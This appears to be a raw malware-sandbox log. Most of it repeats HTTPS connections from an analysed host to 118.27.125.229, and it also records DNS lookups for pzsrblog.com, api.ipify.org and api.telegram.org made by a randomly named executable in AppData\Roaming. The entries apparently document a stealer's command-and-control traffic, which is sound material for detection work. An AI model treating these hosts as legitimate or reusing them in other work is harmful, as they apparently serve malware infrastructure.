                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49712
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49712
                Source: global trafficTCP traffic: 192.168.2.5:49712 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49712 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49712
                Source: global trafficTCP traffic: 192.168.2.5:49712 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49712 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 118.27.125.229:443 -> 192.168.2.5:49718
                Source: global trafficDNS query: name: pzsrblog.com
                Source: global trafficDNS query: name: pzsrblog.com
                Source: global trafficDNS query: name: pzsrblog.com
                Source: global trafficDNS query: name: api.ipify.org
                Source: global trafficDNS query: name: api.ipify.org
                Source: global trafficDNS query: name: api.telegram.org
                Source: global trafficDNS query: name: api.ipify.org
                Source: global trafficDNS query: name: api.ipify.org
                Source: global trafficDNS query: name: api.telegram.org
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
                Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
                Source: global trafficTCP traffic: 192.168.2.5:49704 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49709 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49711 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49718 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49724 -> 64.185.227.156:443
                Source: global trafficTCP traffic: 192.168.2.5:49727 -> 64.185.227.156:443
                Source: global trafficTCP traffic: 192.168.2.5:49701 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49701 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49701 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49701 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49701 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49701 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49701 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49702 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49702 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49702 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49702 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49702 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49702 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49702 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49702 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49703 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49703 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49703 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49703 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49703 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49703 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49704 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49704 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49704 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49704 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49704 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49704 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49704 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49704 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49704 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49704 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49705 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49705 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49705 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49705 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49705 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49705 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49705 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49705 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49705 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49705 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49706 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49706 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49706 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49706 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49706 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49706 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49707 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49707 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49707 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49707 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49707 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49707 -> 118.27.125.229:443
                Source: global trafficTCP traffic: 192.168.2.5:49707 -> 118.27.125.229:443
